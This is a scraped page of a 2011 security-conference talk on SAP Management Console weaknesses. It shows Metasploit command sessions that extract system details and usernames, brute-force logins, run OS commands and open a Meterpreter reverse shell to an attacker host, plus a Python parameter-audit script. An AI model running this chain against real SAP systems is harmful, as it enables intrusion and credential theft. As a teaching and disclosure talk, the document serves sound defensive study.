SAP (in)security
Scrubbing SAP clean with SOAP
        Chris John Riley
“THE WISEST MAN, IS HE WHO KNOWS, THAT HE KNOWS NOTHING”
SOCRATES: APOLOGY, 21D
NOT AN EXPERT!
SPANISH IS NOT MY STRONG POINT
NO ME TOQUES AHÍ! (DON'T TOUCH ME THERE!)
1)   What's what
2)   Information is king
3)   Getting in the middle
4)   Putting it all together
5)   Stopping Bob!
WHAT’S WHAT
“…the world's leading provider of
business software, SAP (which stands for
"Systems, Applications, and Products in
Data Processing") delivers products and
services that help accelerate business
innovation for our customers.”
Other people describe them as…

“…the world's leading repository of
business critical information, SAP (which
stands for ”Security Ain't [our] Problem")
delivers products and services that help
attackers gain access to critical
enterprise data.”
IS IT REALLY THAT BAD?
So Many Reasons
- Vulnerabilities are a part of it!
  - Every system has its vulnerabilities
- SAP installations often fall to the business
  - Not an operations problem
  - Financial data should be handled by the business
  - Security team never gets close to it!
“YOU CAN'T TEST THAT, IT'S BUSINESS CRITICAL!”
UNKNOWN PROJECT MANAGER
You’re getting SOAP all over my SAP!

[Venn diagram: THIS TALK sits at the intersection of SAP, Security, Netweaver and SOAP]
SIMPLE OBJECT ACCESS PROTOCOL
WRONG KIND OF SOAP!
SOAP Request Example (1)
POST /InStock HTTP/1.1
....
<?xml version="1.0"?>
<soap:Envelope
  xmlns:soap="http://www.w3.org/2001/12/soap-envelope"
  soap:encodingStyle="http://www.w3.org/2001/12/soap-encoding">
  <soap:Body>....</soap:Body>
</soap:Envelope>
SOAP Request Example (2)

...
<soap:Body xmlns:m="http://test.org/stock">
  <m:GetStockPrice>
    <m:StockName>SAP</m:StockName>
  </m:GetStockPrice>
</soap:Body>
...
SOAP Response Example

...
  <m:GetStockPriceResponse>
    <m:Price>34.5</m:Price>
  </m:GetStockPriceResponse>
</soap:Body>
...
A LITTLE BIT ABOUT SAP MANAGEMENT CONSOLE
SAP MC Communications

- Default port 5<instance>13/14
  - 50013 HTTP
  - 50014 HTTPS
- Can use SSL
  - If it's configured
  - More on this later!
SAP MC Communications

- Uses Basic auth for some functions
  - Yes... It's 2011
  - Yes... Companies still use Basic Auth
- Most functions don't even use that!
  - Yes... Unauthenticated!
ENABLED BY DEFAULT… ON ALL SAP SYSTEMS!
SAP MC MMC Snap-in
SAP MC JAVA Applet
INFORMATION IS KING
“If there's one thing SAP MC loves, it's giving away information“
Quote by: Me, just now!
Nessus will save us!
Show me the money!
Information is king

- Version information
  - Sure, HTTP headers give that!
  - Nothing new here... mostly
- Down to the patch-level
  - Can you say “targeted attack“
Version Information
msf auxiliary(sap_mgmt_con_version) > show options

Module options (auxiliary/scanner/sap/sap_mgmt_con_version):
  Name       Current Setting Required Description
  ----       ---------------   --------      -----------
  Proxies                      no         Use a proxy chain
  RHOSTS     172.16.15.128     yes        The target address range
  RPORT      50013             yes        The target port
  THREADS    1                 yes        The number of threads
  URI        /                 no         Path to the SAP MC
  VHOST                        no         HTTP server virtual host
Version Information
msf auxiliary(sap_mgmt_con_version) > run

[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[+] [SAP] Version Number Extracted - 172.16.15.128:50013
[+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel
[+] [SAP] SID: NSP
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Information is king

- Startup profile
  - Instance name
  - SAP System Name
  - SAP SID
  - SAP DB Schema
  - Paths
  - ....
Startup Profile
msf auxiliary(sap_mgmt_con_startprofile) > run

[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[+] [SAP] Startup Profile Extracted: \\WINXPSAP-TST\sapmnt\NSP\SYS\profile\START_DVEBMGS00_WINXPSAP-TST
[*] SAPSYSTEMNAME = NSP
[*] SAPGLOBALHOST = WINXPSAP-TST
[*] SAPSYSTEM = 00
[*] INSTANCE_NAME = DVEBMGS00
[*] DIR_PROFILE = \\WINXPSAP-TST\sapmnt\NSP\SYS\profile
[*] _PF = $(DIR_PROFILE)\NSP_DVEBMGS00_WINXPSAP-TST
[*] dbs/ada/schema = SAPNSP
Information is king

- Server / Instance Environment
  - Computername
  - OS Service username
  - Database Names
    - Database Type (Oracle, MaxDB, ...)
  - Full Server Environment Variable list!
    - Information overload
    - OMG why!
Environment
msf auxiliary(sap_mgmt_con_getenv) > run

[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[*] COMPUTERNAME=WINXPSAP-TST
[*] ComSpec=C:\WINDOWS\system32\cmd.exe
[*] DBMS_TYPE=ada
[*] FP_NO_HOST_CHECK=NO
[*] OS=Windows_NT
[*] USERNAME=SAPServiceNSP
[*] PSModulePath=C:\windows\system32\PowerShell...
[*] SAPEXE=E:\usr\sap\NSP\SYS\exe\uc\NTI386
[*] TMP=E:\usr\sap\NSP\tmp
Information is king

- SAP Log/Tracefiles
  - SAP Startup Logs
  - Error / Debug Logs
    - Developer Traces
  - Security Logs
- SAP ABAP SysLog
  - SAP Startup Times
  - PIDs
  - Services + Status Info
Log/Trace Files
msf auxiliary(sap_mgmt_con_listlogfiles) > run

[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
  Filename          Size   Timestamp
  --------          ----   ---------
  available.log     2268   2011 10 16 12:52:33
  dev_cp            4397   2011 04 19 10:30:48
  dev_disp          4612   2011 10 14 15:06:14
  dev_icm           6594   2011 10 14 15:07:38
  sapstart.log      629    2011 10 14 15:06:04
  sapstartsrv.log   754    2011 10 16 10:04:36
  stderr1           903    2011 10 14 15:06:04
Log/Trace Files
<SAPControl:ReadDeveloperTraceResponse>
<name>E:\usr\sap\NSP\DVEBMGS00\work\dev_w0</name>
<item>trc file: "dev_w0", trc level: 1, release: "720"</item>
<item>---------------------------------------------------</item>
<item>* ACTIVE TRACE LEVEL 1</item>
<item>M pid 3564</item>
<item>M DpSysAdmExtCreate: ABAP is active</item>
<item>M DpShMCreate: allocated sys_adm at 09A40048</item>
<item>M DpShMCreate: allocated wp_adm at 09A43020</item>
<item>M DpShMCreate: allocated tm_adm at 09A47E48</item>
…
ABAP Log File
<SAPControl:ABAPReadSyslogResponse><log>
<item><Time>2011 10 14 15:06:18</Time>
<Text>SAP: ICM started on host WINXPSAP-TST (PID: 3536)</Text>
<Severity>SAPControl-GREEN</Severity></item>
<item><Time>2011 10 14 15:06:12</Time>
<Text>SAP Basis: Active ICU Version 3.4; Compiled With ICU 3.4; Unicode Version 4.1</Text>
<Severity>SAPControl-GREEN</Severity></item>
…
Information is king

- Extracting data from logfiles
  - Logfiles include usernames
    - Scrape for SAP usernames
    - Instant brute-force user list!
- Just an example of the data available
Extract SAP Users
[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[+] [SAP] Users Extracted: 10 entries extracted
[+] [SAP] Extracted User: SAPSYS
[+] [SAP] Extracted User: TEST1
[+] [SAP] Extracted User: TESTDEV
[+] [SAP] Extracted User: ADMIN1
[+] [SAP] Extracted User: SADM
[+] [SAP] Extracted User: TEST2
…
Information is king

- Process Parameters
  - Output of the entire SAP configuration
  - Password Policies
    - Set up your brute-force just right ;)
  - Hash Types
    - Still supporting those old 8 char hashes?
  - Security Audit Log Enabled?
    - rsau/enabled (default: 0)
    - Is anybody watching?
Process Parameters
msf auxiliary(sap_mgmt_con_getprocessparameter) > run
[*] [SAP] Connecting to SAP MC on 172.16.15.128:50013
[*] [SAP] Attempting to matche (?i-mx:^login/password)
[SAP] Process Parameters
Name                                          Value
 ------                                  ----------
login/password_charset                        1
login/password_downwards_compatibility 1
login/password_hash_algorithm                 encoding=RFC2307,
                                 algorithm=iSSHA-1, saltsize=96
login/password_max_idle_productive            0
Process Parameters
<SAPControl:GetProcessParameterResponse><parameter>
<item><name>DIR_AUDIT</name>
<group>System</group>
<description>Directory for security audit files</description>
<unit/><value>E:\usr\sap\NSP\DVEBMGS00\log</value></item>
<item><name>login/fails_to_user_lock</name>
<group>Login</group>
<description>Number of invalid login attempts until user lock</description>
<unit/><value> 5 </value></item>
…
Information is king

- Useful Process Parameters
  - rsau/enabled
  - login/password_downwards_compatibility
  - login/failed_user_auto_unlock
  - login/fails_to_user_lock
  - login/min_password_lng
  - login/password_charset
  - ....

*Check out consolut.com for a great list
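A configuration check built on the parameters listed above, added here as an example (it is not code from the talk, from SAP or from the Metasploit modules shown): it parses a constructed GetProcessParameterResponse shaped like the excerpt in the slides and flags values outside an assumed hardening baseline. The SOAP namespace URI and the baseline thresholds are this example's own assumptions, not SAP recommendations.

```python
"""Baseline check over the SAP profile parameters that the SAP Management
Console (sapstartsrv) hands out via its GetProcessParameter SOAP method.

Added example, not code from the talk, from SAP or from Metasploit.  The
response below is CONSTRUCTED to mirror the GetProcessParameterResponse
fragment in the slides; the baseline values are this example's own
assumptions, not SAP's published recommendations.
"""
import xml.etree.ElementTree as ET

# Constructed sample: same element layout as the slide excerpt, wrapped in a
# SOAP envelope (namespace URI assumed; the slides only show the prefix).
SAMPLE_RESPONSE = r"""<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:SAPControl="urn:SAPControl">
<SOAP-ENV:Body><SAPControl:GetProcessParameterResponse><parameter>
<item><name>DIR_AUDIT</name><group>System</group>
<description>Directory for security audit files</description>
<unit/><value>E:\usr\sap\NSP\DVEBMGS00\log</value></item>
<item><name>login/fails_to_user_lock</name><group>Login</group>
<description>Number of invalid login attempts until user lock</description>
<unit/><value> 5 </value></item>
<item><name>rsau/enabled</name><group>Audit</group>
<description>Enable Security Audit Log</description><unit/><value>0</value></item>
<item><name>login/password_downwards_compatibility</name><group>Login</group>
<description>Downward compatibility of password hashes</description>
<unit/><value>1</value></item>
<item><name>login/min_password_lng</name><group>Login</group>
<description>Minimum password length</description><unit/><value>6</value></item>
<item><name>login/failed_user_auto_unlock</name><group>Login</group>
<description>Unlock users at midnight</description><unit/><value>1</value></item>
</parameter></SAPControl:GetProcessParameterResponse></SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""


def parse_process_parameters(xml_text):
    """Return {parameter name: value} from a GetProcessParameterResponse.

    The <item>/<name>/<value> elements carry no namespace prefix in the slide
    excerpt, so they are matched by bare tag name.  Values are stripped
    because sapstartsrv pads some of them (e.g. '<value> 5 </value>').
    """
    root = ET.fromstring(xml_text)
    params = {}
    for item in root.iter("item"):
        name = item.findtext("name")
        if name:
            params[name.strip()] = (item.findtext("value") or "").strip()
    return params


def _int_or_none(value):
    try:
        return int(value)
    except (TypeError, ValueError):
        return None


# (parameter, predicate on the integer value, why a failure matters).
# Thresholds are this example's assumed baseline.
BASELINE = [
    ("rsau/enabled", lambda v: v == 1,
     "Security Audit Log disabled: logon failures and admin actions go unrecorded"),
    ("login/password_downwards_compatibility", lambda v: v == 0,
     "old downward-compatible password hashes still generated/accepted"),
    ("login/fails_to_user_lock", lambda v: v is not None and 1 <= v <= 5,
     "too many failed logons tolerated before the user is locked"),
    ("login/failed_user_auto_unlock", lambda v: v == 0,
     "locked users are unlocked automatically, so a lockout only delays guessing"),
    ("login/min_password_lng", lambda v: v is not None and v >= 8,
     "minimum password length below 8"),
]


def audit(params):
    """Return a list of (parameter, reported value, reason) findings.

    A parameter missing from the response is reported too: an audit that
    silently skips it would pass a system that never set it.
    """
    findings = []
    for name, ok, reason in BASELINE:
        if name not in params:
            findings.append((name, None, "not present in response"))
            continue
        if not ok(_int_or_none(params[name])):
            findings.append((name, params[name], reason))
    return findings


if __name__ == "__main__":
    for name, value, reason in audit(parse_process_parameters(SAMPLE_RESPONSE)):
        print(f"{name:45} {str(value):>6}  {reason}")
```

Pointed at a real response saved from your own sapstartsrv, the same parser turns what an unauthenticated caller can already read into a finding list for the Basis team.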
“I put a whitebox configuration audit in your blackbox penetration test, so you can whitebox SAP while you blackbox it!“
Quote by: Me, just now!
IN CASE YOU FORGOT… ALL THE FUNCTIONS SO FAR ARE UNAUTHENTICATED
BUT IT'S OK! YOU HAVE TO BE INSIDE THE NETWORK…
Right? Right? Right?
[Bar chart: Number of SAP servers listening on public addresses, per service: Router, Gateway, SAP MC, SAP MC (SSL); y-axis 2,500 to 2,700]
GETTING IN THE MIDDLE
Basic auth is your friend!
SAP MC authentication
MAN IN THE MIDDLE… LET ME COUNT THE WAYS…
Getting in the middle

- Force Authentication
  - Basic Auth == Clear Text
  - Credentials FTW!
- Alter Requests
  - Do what YOU want
- Alter Responses
SAP MC authentication
SSL PROTECTION: 4 MAJOR OPTIONS
Getting in the middle

- Self Signed
- Device Default
  - Often the same on EVERY device
  - Not an option for SAP
- Enterprise CA
  - You sign your own certs centrally
  - PKI Infrastructure
- Externally signed
  - DigiNotar to the rescue!
  - SAP also offer signing services
Getting in the middle

- Impersonate SSL
  - There's a module for that!
    - Metasploit (ssl_impersonate.rb)
  - Creates a fake cert
    - As close to the original as possible
  - Useful SE options
    - Expired yesterday
    - Add CN names for ease of use
Getting in the middle

As near as darn a clone of the original
  - Fingerprints + Serial Number differ

All CN data is 100% cloned…
  - Average users don’t care!
PUTTING IT ALL TOGETHER
OSExecute

- SAP MC generously offers the OSExecute function
  - Valid username/password required
    - That's handy!
USERNAME / PASSWORD?
MITM

- Using the force-auth method
- Check under the keyboard
- Post-it notes!
- Rubber hose method
Brute-Force

- Metasploit module
  - Set SAP SID for SAP specific checks
- Watch out for lockouts!
  - Denial of Service?
Brute Force
msf auxiliary(sap_mgmt_con_brute_login) > set SAP_SID NSP
msf auxiliary(sap_mgmt_con_brute_login) > run

[*] SAPSID set to 'NSP' - Setting default SAP wordlist
[*] Trying username:'sapservicensp' password:''
[-] [01/18] - failed to login as 'sapservicensp' password: ''
[*] Trying username:'sapservicensp' password:'sapserviceNSP'
[-] [02/18] - failed to login as 'sapadm' password: ''
[*] Trying username:'nspadm' password:''
…
OSExecute
auxiliary(sap_..._osexec) > set RHOSTS 172.16.15.128
auxiliary(sap_..._osexec) > set USERNAME sapservicensp
auxiliary(sap_..._osexec) > set PASSWORD Pr0d@dm1n
auxiliary(sap_..._osexec) > set CMD hostname
auxiliary(sap_..._osexec) > run
[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[+] [SAP] Command run as PID: 1240
   Command output
   --------------
  WINXPSAP-TST
THANKS, BUT WE WANT FULL ACCESS!
Getting Meterpreter

- Using tricks built into Metasploit
  - Encode Payload
  - Split it up into chunks
  - Shove it in
  - Start it up!
  - Profit
OSExecute Meterpreter
msf exploit(sap_mgmt_con_osexec_exploit) > exploit

[*] Started reverse handler on 172.16.15.134:4444
[*] Command Stager - 7.42% done (7499/101079 bytes)
...

[*] Command Stager - 100.00% done (101079/101079 bytes)
[*] Meterpreter session 1 opened (172.16.15.134:4444 ->
   172.16.15.128:1144) at 2011-10-16 14:41:59 +0200
meterpreter > getuid
Server username: WINXPSAP-TST\SAPServiceNSP
STOPPING BOB!
WHY IS YOUR SAP MC ACCESSIBLE TO THE WORLD!
HTTPS == SLIGHTLY LESS BAD
Fixing the issues

- SAP Fix
  - Note 1439348
    - Issue also discovered by Onapsis
  - No idea what it says!
    - SAP restricts ALL fix info to customers only
SAP SECURITY ISN’T ALL ABOUT ROLES
INFRASTRUCTURE
DATABASE
WEB APPLICATIONS
CLIENT-SIDE APPS
SAP IS COMPLEX, TEST IT!
Questions ?
  http://c22.cc
contact@c22.cc
Big Thanks

- The REAL SAP Security Researchers
  - Onapsis, DSecRG, Raul Siles, CYBSEC
- SAP PSRT (for emailing me a lot)
- DirtySec (You know who you are!)
- MacLemon (for the PPT-fu)
- ED
  - For inviting us, even though we cause problems!
- All the people who helped make this happen
Thanks for coming
http://c22.cc
contact@c22.cc
Sorry for sucking so bad!
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Jeffrey Haguewood
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
DianaGray10
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Product School
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
DianaGray10
 

Recently uploaded (20)

Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 

SecZone 2011: Scrubbing SAP clean with SOAP

  • 1. SAP (in)security Scrubbing SAP clean with SOAP Chris John Riley
  • 3. “THE WISEST MAN, IS HE WHO KNOWS, THAT HE KNOWS NOTHING” SOCRATES: APOLOGY, 21D
  • 7. SPANISH IS NOT MY STRONGPOINT
  • 8. NO ME TOQUES AHÍ!
  • 9. 1) What's what 2) Information is king 3) Getting in the middle 4) Putting it all together 5) Stopping Bob!
  • 13. “…the world's leading provider of business software, SAP (which stands for "Systems, Applications, and Products in Data Processing") delivers products and services that help accelerate business innovation for our customers.”
  • 14. Other people describe them as… “…the world's leading repository of business critical information, SAP (which stands for "Security Ain't [our] Problem") delivers products and services that help attackers gain access to critical enterprise data.”
  • 15. Some rights reserved by TrevinC
  • 16. IS IT REALLY THAT BAD?
  • 17. Some rights reserved by Telstar Logistics
  • 18. Some rights reserved by Telstar Logistics
  • 19. So Many Reasons
        - Vulnerabilities are a part of it!
          - Every system has its vulnerabilities
        - SAP installations often fall to business
          - Not an operations problem
          - Financial data should be handled by the business
          - Security team never gets close to it!
  • 20. “YOU CAN'T TEST THAT, IT'S BUSINESS CRITICAL!” UNKNOWN PROJECT MANAGER
  • 22. You're getting SOAP all over my SAP! [Venn diagram: THIS TALK sits at the intersection of SAP, Security, Netweaver and SOAP]
  • 23. Some rights reserved by Telstar Logistics
  • 25. WRONG KIND OF SOAP!
  • 26. SOAP Request Example (1)
        POST /InStock HTTP/1.1
        ....
        <?xml version="1.0"?>
        <soap:Envelope
          xmlns:soap="http://www.w3.org/2001/12/soap-envelope"
          soap:encodingStyle="http://www.w3.org/2001/12/soap-encoding">
        <soap:Body>....</soap:Body>
        </soap:Envelope>
  • 28. SOAP Request Example (2)
        ...
        <soap:Body xmlns:m="http://test.org/stock">
          <m:GetStockPrice>
            <m:StockName>SAP</m:StockName>
          </m:GetStockPrice>
        </soap:Body>
        ...
  • 30. SOAP Response Example
        ...
        <m:GetStockPriceResponse>
          <m:Price>34.5</m:Price>
        </m:GetStockPriceResponse>
        </soap:Body>
        ...
  • 32. A LITTLE BIT ABOUT SAP MANAGEMENT CONSOLE
  • 33. SAP MC Communications
        - Default port 5<instance>13/14
          - 50013 HTTP
          - 50014 HTTPS
        - Can use SSL
          - If it's configured
          - More on this later!
  • 34. SAP MC Communications
        - Uses Basic auth for some functions
          - Yes... It's 2011
          - Yes... Companies still use Basic Auth
        - Most functions don't even use that!
          - Yes... Unauthenticated!
  • 36. ON ALL SAP SYSTEMS!
  • 37. SAP MC MMC Snap-in
  • 38. SAP MC JAVA Applet
  • 40. “If there's one thing SAP MC loves, it's giving away information” Quote by: Me, just now!
  • 42. Show me the money!
  • 44. Information is king
        - Version information
          - Sure, HTTP headers give that!
          - Nothing new here... mostly
        - Down to the patch-level
          - Can you say "targeted attack"
  • 45. Version Information
        msf auxiliary(sap_mgmt_con_version) > show options
        Module options (auxiliary/scanner/sap/sap_mgmt_con_version):
           Name     Current Setting  Required  Description
           ----     ---------------  --------  -----------
           Proxies                   no        Use a proxy chain
           RHOSTS   172.16.15.128    yes       The target address range
           RPORT    50013            yes       The target port
           THREADS  1                yes       The number of threads
           URI      /                no        Path to the SAP MC
           VHOST                     no        HTTP server virtual host
  • 47. Version Information
        msf auxiliary(sap_mgmt_con_version) > run
        [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
        [+] [SAP] Version Number Extracted - 172.16.15.128:50013
        [+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel
        [+] [SAP] SID: NSP
        [*] Scanned 1 of 1 hosts (100% complete)
        [*] Auxiliary module execution completed
  • 49. Information is king
        - Startup profile
          - Instance name
          - SAP System Name
          - SAP SID
          - SAP DB Schema
          - Paths
          - ....
  • 50. Startup Profile
        msf auxiliary(sap_mgmt_con_startprofile) > run
        [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
        [+] [SAP] Startup Profile Extracted: \\WINXPSAP-TST\sapmnt\NSP\SYS\profile\START_DVEBMGS00_WINXPSAP-TST
        [*] SAPSYSTEMNAME = NSP
        [*] SAPGLOBALHOST = WINXPSAP-TST
        [*] SAPSYSTEM = 00
        [*] INSTANCE_NAME = DVEBMGS00
        [*] DIR_PROFILE = \\WINXPSAP-TST\sapmnt\NSP\SYS\profile
        [*] _PF = $(DIR_PROFILE)\NSP_DVEBMGS00_WINXPSAP-TST
        [*] dbs/ada/schema = SAPNSP
  • 52. Information is king
        - Server / Instance Environment
          - Computername
          - OS Service username
          - Database Names
          - Database Type (Oracle, MaxDB, ...)
        - Full Server Environment Variable list!
          - Information overload
          - OMG why!
  • 53. Environment
        msf auxiliary(sap_mgmt_con_getenv) > run
        [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
        [*] COMPUTERNAME=WINXPSAP-TST
        [*] ComSpec=C:\WINDOWS\system32\cmd.exe
        [*] DBMS_TYPE=ada
        [*] FP_NO_HOST_CHECK=NO
        [*] OS=Windows_NT
        [*] USERNAME=SAPServiceNSP          <- Operating System User
        [*] PSModulePath=C:\windows\system32\PowerShell...
        [*] SAPEXE=E:\usr\sap\NSP\SYS\exe\uc\NTI386
        [*] TMP=E:\usr\sap\NSP\tmp
  • 55. Information is king
        - SAP Log/Tracefiles
          - SAP Startup Logs
          - Error / Debug Logs
          - Developer Traces
          - Security Logs
          - SAP ABAP SysLog
        - SAP Startup Times
        - PIDs
        - Services + Status Info
  • 56. Log/Trace Files
        msf auxiliary(sap_mgmt_con_listlogfiles) > run
        [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
        Filename         Size  Timestamp
        --------         ----  ---------
        available.log    2268  2011 10 16 12:52:33
        dev_cp           4397  2011 04 19 10:30:48
        dev_disp         4612  2011 10 14 15:06:14
        dev_icm          6594  2011 10 14 15:07:38
        sapstart.log      629  2011 10 14 15:06:04
        sapstartsrv.log   754  2011 10 16 10:04:36
        stderr1           903  2011 10 14 15:06:04
  • 57. Log/Trace Files
        <SAPControl:ReadDeveloperTraceResponse>
        <name>E:\usr\sap\NSP\DVEBMGS00\work\dev_w0</name>
        <item>trc file: "dev_w0", trc level: 1, release: "720"</item>
        <item>---------------------------------------------------</item>
        <item>* ACTIVE TRACE LEVEL 1</item>
        <item>M pid 3564</item>
        <item>M DpSysAdmExtCreate: ABAP is active</item>
        <item>M DpShMCreate: allocated sys_adm at 09A40048</item>
        <item>M DpShMCreate: allocated wp_adm at 09A43020</item>
        <item>M DpShMCreate: allocated tm_adm at 09A47E48</item>
        …
  • 58. ABAP Log File
        <SAPControl:ABAPReadSyslogResponse><log>
        <item><Time>2011 10 14 15:06:18</Time>
        <Text>SAP: ICM started on host WINXPSAP-TST (PID: 3536)</Text>
        <Severity>SAPControl-GREEN</Severity></item>
        <item><Time>2011 10 14 15:06:12</Time>
        <Text>SAP Basis: Active ICU Version 3.4; Compiled With ICU 3.4; Unicode Version 4.1</Text>
        <Severity>SAPControl-GREEN</Severity></item>
        …
  • 59. Information is king
        - Extracting data from logfiles
          - Logfiles include usernames
          - Scrape for SAP usernames
          - Instant brute-force user list!
        - Just an example of the data available
  • 60. Extract SAP Users
        [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
        [+] [SAP] Users Extracted: 10 entries extracted
        [+] [SAP] Extracted User: SAPSYS
        [+] [SAP] Extracted User: TEST1
        [+] [SAP] Extracted User: TESTDEV
        [+] [SAP] Extracted User: ADMIN1
        [+] [SAP] Extracted User: SADM
        [+] [SAP] Extracted User: TEST2
        …
  • 62. Information is king
        - Process Parameters
          - Output of the entire SAP configuration
        - Password Policies
